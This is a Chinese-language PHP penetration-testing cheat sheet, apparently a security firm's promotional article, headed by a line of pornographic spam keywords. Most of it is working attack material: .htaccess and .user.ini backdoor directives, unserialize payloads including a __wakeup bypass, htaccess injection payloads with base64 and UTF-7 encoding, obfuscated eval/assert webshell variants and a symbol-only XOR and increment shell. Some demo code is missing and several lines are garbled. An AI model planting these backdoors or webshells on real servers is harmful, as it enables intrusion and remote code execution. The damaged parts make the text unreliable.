亚洲视频二区_亚洲欧洲日本天天堂在线观看_日韩一区二区在线观看_中文字幕不卡一区

很多想做滲透測試的朋友都想了解關于php后門漏洞的安全測試重點方法,以及該如何預防被中php后門，本節由我們的安全高級滲透工程師進行全面的講解,來讓大家更好的理解和了解php代碼的安全檢測,讓網站得到最大化的安全保障,安全保障了,網站才能更長遠的運行下去。

 

 

 

4.1.1. 后門

4.1.1.1. php.ini構成的后門

利用 auto_prepend_file 和 include_path

4.1.1.2. .htaccess后門

php_value auto_Append_file .htaccess

#<?php phpinfo();

php_flag allow_url_include 1

php_value auto_append_file data://text/plain;,PD9waHAgcGhwaW5mbygpOw==

#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B

4.1.1.3. .user.ini文件構成的PHP后門

.user.ini可運行于所有以fastcgi運行的server。利用方式同php.in

4.1.2. 反序列化

4.1.2.1. PHP序列化實現

PHP序列化處理共有三種，分別為php_serialize、php_binary和 WDDX，默認為php_serialize，可通過配置中的 session.serialize_handler 修改。

其中php_serialize的實現在 php-src/ext/standard/var.c 中，主要函數為 php_var_serialize_intern ，序列化后的格式如下：

• boolean
• b:<value>;
• b:1; // true
• b:0; // false
• integer
• i:<value>;
• double
• d:<value>;
• NULL
• N;
• string
• s:<length>:"<value>";
• s:1:"s";
• array
• a:<length>:{key, value};
• a:1:{s:4:"key1";s:6:"value1";} // array("key1" => "value1");
• object
• O:<class_name_length>:"<class_name><number_of_properties>:{<properties>};
• reference
• 指針類型
• R:reference;
• O:1:"A":2:{s:1:"a";i:1;s:1:"b";R:2;}
• $a = new A();$a->a=1;$a->b=&$a->a;

4.1.2.2. PHP反序列化漏洞

php在反序列化的時候會調用 __wakeup / __sleep 等函數，可能會造成代碼執行等問題。若沒有相關函數，在析構時也會調用相關的析構函數，同樣會造成代碼執行。

另外 __toString / __call 兩個函數也有利用的可能。

其中 __wakeup 在反序列化時被觸發，__destruct 在GC時被觸發， __toString 在echo時被觸發, __call 在一個未被定義的函數調用時被觸發。

下面提供一個簡單的demo.

利用 auto_prepend_file 和 include_path

輸出

construct

Data's value is raw value.

destruct

string(44) "O:4:"Demo":1:{s:4:"data";s:9:"raw value";}"

把序列化的字符串修改一下后，執行

unserialize('O:4:"Demo":1:{s:4:"data";s:15:"malicious value";}');

輸出

wake up

Data's value is malicious value.

destruct

這里看到，值被修改了.

上面是一個 unserialize() 的簡單應用，不難看出，如果 __wakeup() 或者 __desturct() 有敏感操作，比如讀寫文件、操作數據庫，就可以通過函數實現文件讀寫或者數據讀取的行為。

那么，在 __wakeup() 中加入判斷是否可以阻止這個漏洞呢？在 __wakeup() 中我們加入一行代碼

 

 

 

但其實還是可以繞過的，在 PHP5 < 5.6.25， PHP7 < 7.0.10 的版本都存在wakeup的漏洞。當反序列化中object的個數和之前的個數不等時，wakeup就會被繞過，于是使用下面的payload

unserialize('O:7:"HITCON":1:{s:4:"data";s:15:"malicious value";}');

輸出

Data's value is malicious value.

destruct

這里wakeup被繞過，值依舊被修改了。

4.1.3. Disable Functions

 

 

 

4.1.3.1. 機制實現

PHP中Disable Function的實現是在php-src/Zend/Zend-API.c中。PHP在啟動時，讀取配置文件中禁止的函數，逐一根據禁止的函數名調用 zend_disable_function 來實現禁止的效果。

這個函數根據函數名在內置函數列表中找到對應的位置并修改掉，當前版本的代碼如下：

 

 

 

和函數的實現方式類似，disable classes也是這樣實現的

 

 

 

因為這個實現機制的原因，在PHP啟動后通過 ini_set 來修改 disable_functions 或 disable_classes 是無效的。

4.1.3.2. Bypass

• LD_PRELOAD繞過
• PHP OPcache
• Mail函數
• imap_open

4.1.4. Open Basedir

4.1.4.1. 機制實現

PHP中Disable Function的實現是在php-src/main/fopen-wrappers.c中，實現方式是在調用文件等相關操作時調用函數根據路徑來檢查是否在basedir內，其中一部分實現代碼如下：

PHPAPI int php_check_open_basedir_ex(const char *path, int warn)

{

/* Only check when open_basedir is available */

if (PG(open_basedir) && *PG(open_basedir)) {

char *pathbuf;

char *ptr;

char *end;

/* Check if the path is too long so we can give a more useful error

* message. */

if (strlen(path) > (MAXPATHLEN - 1)) {

php_error_docref(NULL, E_WARNING, "File name is longer than the maximum allowed path length on this platform (%d): %s", MAXPATHLEN, path);

errno = EINVAL;

return -1;

}

pathbuf = estrdup(PG(open_basedir))

ptr = pathbuf;

while (ptr && *ptr) {

end = strchr(ptr, DEFAULT_DIR_SEPARATOR);

if (end != NULL) {

*end = '';

end++;

}

if (php_check_specific_open_basedir(ptr, path) == 0) {

efree(pathbuf);

return 0;

}

ptr = end;

}

if (warn) {

php_error_docref(NULL, E_WARNING, "open_basedir restriction in effect. File(%s) is not within the allowed path(s): (%s)", path, PG(open_basedir));

}

efree(pathbuf);

errno = EPERM; /* we deny permission to open it */

return -1;

}

/* Nothing to check... */

return 0;

}

4.1.5. phpinfo相關漏洞

4.1.5.1. Session.Save

PHP的Session默認handler為文件，存儲在 php.ini 的 session.save_path 中，若有任意讀寫文件的權限，則可修改或讀取session。從phpinfo中可獲得session位置

4.1.5.2. Session.Upload

php.ini默認開啟了 session.upload_progress.enabled ， 該選項會導致生成上傳進度文件，其存儲路徑可以在phpinfo中獲取。

那么可以構造特別的報文向服務器發送，在有LFI的情況下即可利用。

4.1.5.3. /tmp臨時文件競爭

phpinfo中可以看到上傳的臨時文件的路徑，從而實現LFI

4.1.6. htaccess injection payload

4.1.6.1. file inclusion

利用 auto_prepend_file 和 include_path

4.1.6.2. code execution

php_value auto_append_file .htaccess

#<?php phpinfo();

4.1.6.3. file inclusion

• php_flag allow_url_include 1
• php_value auto_append_file data://text/plain;,PD9waHAgcGhwaW5mbygpOw==
• #php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
• #php_value auto_append_file /evil-code.txt

4.1.6.4. code execution with UTF-7

php_flag zend.multibyte 1

php_value zend._encoding "UTF-7"

php_value auto_append_file .htaccess

#+ADw?php phpinfo()+ADs

4.1.6.5. Source code disclosure

php_flag engine 0

4.1.7. WebShell

4.1.7.1. 常見變形

• GLOBALS
• eval($GLOBALS['_POST']['op']);
• $_FILE
• eval($_FILE['name']);
• 拆分
• assert(${"_PO"."ST"} ['sz']);
• 動態函數執行
• $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
• create_function
• $function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();
• preg_replace
• rot13
• 進制轉化
• "\x62\x61163\x65\x36\x34137144145\x63\x6f144145"
• 利用文件名
• __FILE__

4.1.7.2. 字符串變形函數

• ucwords
• ucfirst
• trim
• substr_replace
• substr
• strtr
• strtoupper
• strtolower
• strtok
• str_rot13

4.1.7.3. 回調函數

• call_user_func_array
• call_user_func
• array_filter
• array_walk
• array_map
• registregister_shutdown_function
• register_tick_function
• filter_var
• filter_var_array
• uasort
• uksort
• array_reduce
• array_walk
• array_walk_recursive

4.1.7.4. 特殊字符Shell

PHP的字符串可以在進行異或、自增運算的時候，會直接進行運算，故可以使用特殊字符來構成Shell。

@$_++;

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");

@${$__}[!$_](${$__}[$_]);

$_=[];

$_=@"$_"; // $_='Array';

$_=$_['!'=='@']; // $_=$_[0];

$___=$_; // A

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;

$___.=$__; // S

$___.=$__; // S

$__=$_;

$__++;$__++;$__++;$__++; // E

$___.=$__;

$__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R

$___.=$__;

$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T

$___.=$__;

$____='_';

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P

$____.=$__;

$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S

$____.=$__;

$__=$_;

$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T

$____.=$__;

$_=$$____;

$___(_decode($_[_]));

4.1.8. 其它

 

 

 

4.1.8.1. 低精度

php中并不是用高精度來存儲浮點數，而是用使用 IEEE 754 雙精度格式，造成在涉及到浮點數比較的時候可能會出現預期之外的錯誤。比如 php -r "var_dump(0.2+0.7==0.9);" 這行代碼的輸出是 bool(false) 而不是 bool(true)。這在一些情況下可能出現問題。

4.1.8.2. 弱類型

如果使用 == 來判斷相等，則會因為類型推斷出現一些預料之外的行為，比如magic hash，指當兩個md5值都是 0e[0-9]{30} 的時候，就會認為兩個hash值相等。另外在判斷字符串和數字的時候，PHP會自動做類型轉換，那么 1=="1a.php" 的結果會是true

另外在判斷一些hash時，如果傳入的是數組，返回值會為 NULL, 因此在判斷來自網絡請求的數據的哈希值時需要先判斷數據類型。

同樣的， strcmp() ereg() strpos() 這些函數在處理數組的時候也會異常，返回NULL。

4.1.8.3. 命令執行

preg_replace 第一個參數是//e的時候，第二個參數會被當作命令執行

4.1.8.4. 截斷

PHP字符存在截斷行為，可以使用 ereg / %00 / iconv 等實現php字符截斷的操作，從而觸發漏洞。

4.1.8.5. 變量覆蓋

當使用 extract / parse_str 等函數時，或者使用php的 $$ 特性時，如果沒有正確的調用，則可能使得用戶可以任意修改變量。

4.1.8.6. 執行系統命令

禁用的函數可以在phpinfo中的 disable_functions 中查看

• pcntl_exec
• exec
• passthru
• popen
• shell_exec
• system
• proc_open

4.1.8.7. Magic函數

• __construct() __destruct()
• __call() __callStatic()
• __get() __set()
• __isset() __unset()
• __sleep() __wakeup()
• __toString()
• __invoke()
• __set_state()
• __clone()
• __debugInfo()

4.1.8.8. 文件相關敏感函數

• move_uploaded_file
• file_put_contents / file_get_contents
• unlink
• fopen / fgets

4.1.8.9. php特性

• php自身在解析請求的時候，如果參數名字中包含” “、”.”、”[“這幾個字符，會將他們轉換成下劃線,講了那么多滲透測試中PHP后門的安全檢測方法,那么如果對此有需求的朋友可以咨詢專業的網站安全公司來做滲透測試。